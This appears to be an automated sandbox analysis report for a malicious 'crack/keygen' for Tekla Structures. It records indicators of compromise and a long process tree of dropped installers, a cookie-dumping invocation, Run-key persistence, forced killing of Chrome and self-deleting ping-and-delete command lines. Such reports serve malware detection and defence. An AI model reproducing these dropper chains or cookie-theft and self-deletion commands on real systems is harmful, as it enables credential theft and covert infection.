Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 324 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 145 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 156 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 314 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2672 setups.tmp 2672 setups.tmp 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe 3144 multitimer.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 2228 Setup.exe Token: SeCreateTokenPrivilege 2664 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2664 askinstall20.exe Token: SeLockMemoryPrivilege 2664 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2664 askinstall20.exe Token: SeMachineAccountPrivilege 2664 askinstall20.exe Token: SeTcbPrivilege 2664 askinstall20.exe Token: SeSecurityPrivilege 2664 askinstall20.exe Token: SeTakeOwnershipPrivilege 2664 askinstall20.exe Token: SeLoadDriverPrivilege 2664 askinstall20.exe Token: SeSystemProfilePrivilege 2664 askinstall20.exe Token: SeSystemtimePrivilege 2664 askinstall20.exe Token: SeProfSingleProcessPrivilege 2664 askinstall20.exe Token: SeIncBasePriorityPrivilege 2664 askinstall20.exe Token: SeCreatePagefilePrivilege 2664 askinstall20.exe Token: SeCreatePermanentPrivilege 2664 askinstall20.exe Token: SeBackupPrivilege 2664 askinstall20.exe Token: SeRestorePrivilege 2664 askinstall20.exe Token: SeShutdownPrivilege 2664 askinstall20.exe Token: SeDebugPrivilege 2664 askinstall20.exe Token: SeAuditPrivilege 2664 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2664 askinstall20.exe Token: SeChangeNotifyPrivilege 2664 askinstall20.exe Token: SeRemoteShutdownPrivilege 2664 askinstall20.exe Token: SeUndockPrivilege 2664 askinstall20.exe Token: SeSyncAgentPrivilege 2664 askinstall20.exe Token: SeEnableDelegationPrivilege 2664 askinstall20.exe Token: SeManageVolumePrivilege 2664 askinstall20.exe Token: SeImpersonatePrivilege 2664 askinstall20.exe Token: SeCreateGlobalPrivilege 2664 askinstall20.exe Token: 31 2664 askinstall20.exe Token: 32 2664 askinstall20.exe Token: 33 2664 askinstall20.exe Token: 34 2664 askinstall20.exe Token: 35 2664 askinstall20.exe Token: SeDebugPrivilege 3144 multitimer.exe Token: SeDebugPrivilege 1752 MicrosoftEdge.exe Token: SeDebugPrivilege 1752 MicrosoftEdge.exe Token: SeDebugPrivilege 1752 MicrosoftEdge.exe Token: SeDebugPrivilege 1752 MicrosoftEdge.exe Token: SeDebugPrivilege 4192 taskkill.exe Token: SeDebugPrivilege 4492 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4492 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4492 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4492 MicrosoftEdgeCP.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2276 setups.exe 2672 setups.tmp 1752 MicrosoftEdge.exe 4424 BTRSetp.exe 4424 BTRSetp.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 1456 wrote to memory of 2260 1456 Tekla_Structures_21_1_Russia_crack_by_aaocg.exe 79 PID 1456 wrote to memory of 2260 1456 Tekla_Structures_21_1_Russia_crack_by_aaocg.exe 79 PID 1456 wrote to memory of 2260 1456 Tekla_Structures_21_1_Russia_crack_by_aaocg.exe 79 PID 2260 wrote to memory of 1504 2260 cmd.exe 82 PID 2260 wrote to memory of 1504 2260 cmd.exe 82 PID 2260 wrote to memory of 1504 2260 cmd.exe 82 PID 2260 wrote to memory of 3856 2260 cmd.exe 83 PID 2260 wrote to memory of 3856 2260 cmd.exe 83 PID 2260 wrote to memory of 3856 2260 cmd.exe 83 PID 2260 wrote to memory of 2104 2260 cmd.exe 84 PID 2260 wrote to memory of 2104 2260 cmd.exe 84 PID 2260 wrote to memory of 2104 2260 cmd.exe 84 PID 2260 wrote to memory of 2728 2260 cmd.exe 85 PID 2260 wrote to memory of 2728 2260 cmd.exe 85 PID 2260 wrote to memory of 2728 2260 cmd.exe 85 PID 1504 wrote to memory of 4092 1504 keygen-pr.exe 86 PID 1504 wrote to memory of 4092 1504 keygen-pr.exe 86 PID 1504 wrote to memory of 4092 1504 keygen-pr.exe 86 PID 2728 wrote to memory of 2228 2728 keygen-step-4.exe 87 PID 2728 wrote to memory of 2228 2728 keygen-step-4.exe 87 PID 4092 wrote to memory of 1080 4092 key.exe 88 PID 4092 wrote to memory of 1080 4092 key.exe 88 PID 4092 wrote to memory of 1080 4092 key.exe 88 PID 2104 wrote to memory of 3272 2104 keygen-step-3.exe 89 PID 2104 wrote to memory of 3272 2104 keygen-step-3.exe 89 PID 2104 wrote to memory of 3272 2104 keygen-step-3.exe 89 PID 3272 wrote to memory of 3544 3272 cmd.exe 91 PID 3272 wrote to memory of 3544 3272 cmd.exe 91 PID 3272 wrote to memory of 3544 3272 cmd.exe 91 PID 2228 wrote to memory of 3144 2228 Setup.exe 92 PID 2228 wrote to memory of 3144 2228 Setup.exe 92 PID 2228 wrote to memory of 2276 2228 Setup.exe 93 PID 2228 wrote to memory of 2276 2228 Setup.exe 93 PID 2228 wrote to memory of 2276 2228 Setup.exe 93 PID 2276 wrote to memory of 2672 2276 setups.exe 95 PID 2276 wrote to memory of 2672 2276 setups.exe 95 PID 2276 wrote to memory of 2672 2276 setups.exe 95 PID 2728 wrote to memory of 2664 2728 keygen-step-4.exe 94 PID 2728 wrote to memory of 2664 2728 keygen-step-4.exe 94 PID 2728 wrote to memory of 2664 2728 keygen-step-4.exe 94 PID 2664 wrote to memory of 4104 2664 askinstall20.exe 99 PID 2664 wrote to memory of 4104 2664 askinstall20.exe 99 PID 2664 wrote to memory of 4104 2664 askinstall20.exe 99 PID 4104 wrote to memory of 4192 4104 cmd.exe 101 PID 4104 wrote to memory of 4192 4104 cmd.exe 101 PID 4104 wrote to memory of 4192 4104 cmd.exe 101 PID 3144 wrote to memory of 4604 3144 multitimer.exe 105 PID 3144 wrote to memory of 4604 3144 multitimer.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_21_1_Russia_crack_by_aaocg.exe"C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_21_1_Russia_crack_by_aaocg.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:1080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3856
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:3544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\XDOPG9ZFTE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XDOPG9ZFTE\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Users\Admin\AppData\Local\Temp\XDOPG9ZFTE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XDOPG9ZFTE\multitimer.exe" 1 3.1617436097.60681dc102765 1016⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4604 -
C:\Users\Admin\AppData\Local\Temp\XDOPG9ZFTE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XDOPG9ZFTE\multitimer.exe" 2 3.1617436097.60681dc1027657⤵PID:4728
-
C:\Users\Admin\AppData\Local\Temp\12yptj2do0c\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\12yptj2do0c\KiffApp1.exe"8⤵PID:5148
-
-
C:\Users\Admin\AppData\Local\Temp\dpw04coezii\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\dpw04coezii\Setup3310.exe" /Verysilent /subid=5778⤵PID:5224
-
C:\Users\Admin\AppData\Local\Temp\is-I9F89.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-I9F89.tmp\Setup3310.tmp" /SL5="$20306,138429,56832,C:\Users\Admin\AppData\Local\Temp\dpw04coezii\Setup3310.exe" /Verysilent /subid=5779⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\is-GS1GV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GS1GV.tmp\Setup.exe" /Verysilent10⤵PID:4380
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:4968
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:6744
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5652
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:5400
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:1008
-
C:\Users\Admin\AppData\Local\Temp\is-4TQ1T.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-4TQ1T.tmp\lylal220.tmp" /SL5="$303FC,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:6264
-
C:\Users\Admin\AppData\Local\Temp\is-ATO42.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-ATO42.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:6776
-
C:\Program Files\Windows Security\FOBHEQOPOI\irecord.exe"C:\Program Files\Windows Security\FOBHEQOPOI\irecord.exe" /VERYSILENT14⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\is-TC0SJ.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-TC0SJ.tmp\irecord.tmp" /SL5="$30486,6265333,408064,C:\Program Files\Windows Security\FOBHEQOPOI\irecord.exe" /VERYSILENT15⤵PID:7104
-
-
-
C:\Users\Admin\AppData\Local\Temp\5b-e3485-35b-49c80-2ddd63169be4e\Vexeqipishi.exe"C:\Users\Admin\AppData\Local\Temp\5b-e3485-35b-49c80-2ddd63169be4e\Vexeqipishi.exe"14⤵PID:3440
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 194415⤵PID:8084
-
-
-
C:\Users\Admin\AppData\Local\Temp\3d-f01cd-751-8b4b6-98b86b062d661\Neqyfenuzhi.exe"C:\Users\Admin\AppData\Local\Temp\3d-f01cd-751-8b4b6-98b86b062d661\Neqyfenuzhi.exe"14⤵PID:7032
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0crgfav4.1fj\md6_6ydj.exe & exit15⤵PID:3016
-
C:\Users\Admin\AppData\Local\Temp\0crgfav4.1fj\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\0crgfav4.1fj\md6_6ydj.exe16⤵PID:8056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xpjq13si.sxw\toolspab1.exe & exit15⤵PID:7644
-
C:\Users\Admin\AppData\Local\Temp\xpjq13si.sxw\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xpjq13si.sxw\toolspab1.exe16⤵PID:7148
-
C:\Users\Admin\AppData\Local\Temp\xpjq13si.sxw\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xpjq13si.sxw\toolspab1.exe17⤵PID:8024
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xa0vtyei.a2k\askinstall31.exe & exit15⤵PID:7472
-
C:\Users\Admin\AppData\Local\Temp\xa0vtyei.a2k\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\xa0vtyei.a2k\askinstall31.exe16⤵PID:7576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fdalv0rq.5x4\setup_10.2_mix.exe & exit15⤵PID:8128
-
C:\Users\Admin\AppData\Local\Temp\fdalv0rq.5x4\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\fdalv0rq.5x4\setup_10.2_mix.exe16⤵PID:5688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\srfpem3w.s5x\GcleanerWW.exe /mixone & exit15⤵PID:7828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2nyhxa35.jvg\app.exe /8-2222 & exit15⤵PID:7624
-
C:\Users\Admin\AppData\Local\Temp\2nyhxa35.jvg\app.exeC:\Users\Admin\AppData\Local\Temp\2nyhxa35.jvg\app.exe /8-222216⤵PID:6036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fhfq4udv.zbl\file.exe & exit15⤵PID:6216
-
C:\Users\Admin\AppData\Local\Temp\fhfq4udv.zbl\file.exeC:\Users\Admin\AppData\Local\Temp\fhfq4udv.zbl\file.exe16⤵PID:500
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"17⤵PID:4620
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ooeuv352.zs1\Four.exe & exit15⤵PID:5876
-
C:\Users\Admin\AppData\Local\Temp\ooeuv352.zs1\Four.exeC:\Users\Admin\AppData\Local\Temp\ooeuv352.zs1\Four.exe16⤵PID:8076
-
C:\Users\Admin\AppData\Local\Temp\VKY3ZQDGMX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VKY3ZQDGMX\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:6184
-
-
C:\Users\Admin\AppData\Local\Temp\F9SGINMDJF\setups.exe"C:\Users\Admin\AppData\Local\Temp\F9SGINMDJF\setups.exe" ll17⤵PID:5896
-
C:\Users\Admin\AppData\Local\Temp\is-T6ASH.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-T6ASH.tmp\setups.tmp" /SL5="$205CE,635399,250368,C:\Users\Admin\AppData\Local\Temp\F9SGINMDJF\setups.exe" ll18⤵PID:4056
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:5868
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:6972
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:6684
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"11⤵PID:5420
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:5928
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:5260
-
C:\Users\Admin\AppData\Local\Temp\1LBJKTDX19\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1LBJKTDX19\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:6552
-
C:\Users\Admin\AppData\Local\Temp\1LBJKTDX19\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1LBJKTDX19\multitimer.exe" 1 3.1617436162.60681e0291bd2 10313⤵PID:6276
-
C:\Users\Admin\AppData\Local\Temp\1LBJKTDX19\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1LBJKTDX19\multitimer.exe" 2 3.1617436162.60681e0291bd214⤵PID:4208
-
C:\Users\Admin\AppData\Local\Temp\irr3jg140mv\5uwnyxiyl2a.exe"C:\Users\Admin\AppData\Local\Temp\irr3jg140mv\5uwnyxiyl2a.exe" /ustwo INSTALL15⤵PID:4948
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "5uwnyxiyl2a.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\irr3jg140mv\5uwnyxiyl2a.exe" & exit16⤵PID:7884
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "5uwnyxiyl2a.exe" /f17⤵
- Kills process with taskkill
PID:5812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zkq3c30ghi3\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\zkq3c30ghi3\cpyrix.exe" /VERYSILENT15⤵PID:4120
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:8012
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"17⤵PID:7236
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub17⤵PID:7676
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe18⤵PID:3976
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:8132
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:7684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jd5qzzlrvlw\app.exe"C:\Users\Admin\AppData\Local\Temp\jd5qzzlrvlw\app.exe" /8-2315⤵PID:5068
-
-
C:\Users\Admin\AppData\Local\Temp\0ue4ahd4qg3\vpn.exe"C:\Users\Admin\AppData\Local\Temp\0ue4ahd4qg3\vpn.exe" /silent /subid=48215⤵PID:4888
-
C:\Users\Admin\AppData\Local\Temp\is-HAUP9.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-HAUP9.tmp\vpn.tmp" /SL5="$202C6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\0ue4ahd4qg3\vpn.exe" /silent /subid=48216⤵PID:4600
-
-
-
C:\Users\Admin\AppData\Local\Temp\nseabgfllct\vict.exe"C:\Users\Admin\AppData\Local\Temp\nseabgfllct\vict.exe" /VERYSILENT /id=53515⤵PID:4392
-
C:\Users\Admin\AppData\Local\Temp\is-LNVIV.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-LNVIV.tmp\vict.tmp" /SL5="$D0032,870426,780800,C:\Users\Admin\AppData\Local\Temp\nseabgfllct\vict.exe" /VERYSILENT /id=53516⤵PID:1596
-
C:\Users\Admin\AppData\Local\Temp\is-EH5N1.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-EH5N1.tmp\win1host.exe" 53517⤵PID:7416
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\p0rtrexa0bb\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\p0rtrexa0bb\Setup3310.exe" /Verysilent /subid=57715⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\is-MDO19.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-MDO19.tmp\Setup3310.tmp" /SL5="$40300,138429,56832,C:\Users\Admin\AppData\Local\Temp\p0rtrexa0bb\Setup3310.exe" /Verysilent /subid=57716⤵PID:4136
-
C:\Users\Admin\AppData\Local\Temp\is-QQVQS.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QQVQS.tmp\Setup.exe" /Verysilent17⤵PID:6900
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SKQB0X7VLE\setups.exe"C:\Users\Admin\AppData\Local\Temp\SKQB0X7VLE\setups.exe" ll12⤵PID:6652
-
C:\Users\Admin\AppData\Local\Temp\is-3CLK9.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-3CLK9.tmp\setups.tmp" /SL5="$40478,635399,250368,C:\Users\Admin\AppData\Local\Temp\SKQB0X7VLE\setups.exe" ll13⤵PID:6904
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:5348
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:5528
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:6580
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:4124
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\is-KVU5T.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-KVU5T.tmp\LabPicV3.tmp" /SL5="$50394,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:5892
-
C:\Users\Admin\AppData\Local\Temp\is-A1S3R.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-A1S3R.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:6764
-
C:\Program Files\javcse\RUCJEKCLUE\prolab.exe"C:\Program Files\javcse\RUCJEKCLUE\prolab.exe" /VERYSILENT14⤵PID:3516
-
C:\Users\Admin\AppData\Local\Temp\is-D938O.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-D938O.tmp\prolab.tmp" /SL5="$60464,575243,216576,C:\Program Files\javcse\RUCJEKCLUE\prolab.exe" /VERYSILENT15⤵PID:5840
-
-
-
C:\Users\Admin\AppData\Local\Temp\f6-03ca3-ef5-6dca9-a465fd3e904b8\Piharyzhete.exe"C:\Users\Admin\AppData\Local\Temp\f6-03ca3-ef5-6dca9-a465fd3e904b8\Piharyzhete.exe"14⤵PID:5032
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x4vhrxbd.jfr\md6_6ydj.exe & exit15⤵PID:5048
-
C:\Users\Admin\AppData\Local\Temp\x4vhrxbd.jfr\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\x4vhrxbd.jfr\md6_6ydj.exe16⤵PID:7272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h1zdzpcj.2ds\askinstall31.exe & exit15⤵PID:5872
-
C:\Users\Admin\AppData\Local\Temp\h1zdzpcj.2ds\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\h1zdzpcj.2ds\askinstall31.exe16⤵PID:7584
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:7340
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:6372
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qb4bj0tc.fgj\toolspab1.exe & exit15⤵PID:5760
-
C:\Users\Admin\AppData\Local\Temp\qb4bj0tc.fgj\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\qb4bj0tc.fgj\toolspab1.exe16⤵PID:7748
-
C:\Users\Admin\AppData\Local\Temp\qb4bj0tc.fgj\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\qb4bj0tc.fgj\toolspab1.exe17⤵PID:8144
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i1gj3ouy.l1x\setup_10.2_mix.exe & exit15⤵PID:4596
-
C:\Users\Admin\AppData\Local\Temp\i1gj3ouy.l1x\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\i1gj3ouy.l1x\setup_10.2_mix.exe16⤵PID:7492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5kluuilp.oal\GcleanerWW.exe /mixone & exit15⤵PID:8120
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sjvphkfw.u0l\app.exe /8-2222 & exit15⤵PID:7504
-
C:\Users\Admin\AppData\Local\Temp\sjvphkfw.u0l\app.exeC:\Users\Admin\AppData\Local\Temp\sjvphkfw.u0l\app.exe /8-222216⤵PID:512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oyz5ew43.4um\file.exe & exit15⤵PID:4540
-
C:\Users\Admin\AppData\Local\Temp\oyz5ew43.4um\file.exeC:\Users\Admin\AppData\Local\Temp\oyz5ew43.4um\file.exe16⤵PID:8104
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵PID:7848
-
C:\Users\Admin\AppData\Local\Temp\G7IAPO7H2H\setups.exe"C:\Users\Admin\AppData\Local\Temp\G7IAPO7H2H\setups.exe" ll18⤵PID:7540
-
C:\Users\Admin\AppData\Local\Temp\is-GC6IF.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-GC6IF.tmp\setups.tmp" /SL5="$E0314,635399,250368,C:\Users\Admin\AppData\Local\Temp\G7IAPO7H2H\setups.exe" ll19⤵PID:4224
-
-
-
C:\Users\Admin\AppData\Local\Temp\VHD588EFK2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VHD588EFK2\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:1800
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"17⤵PID:6584
-
-
-
-
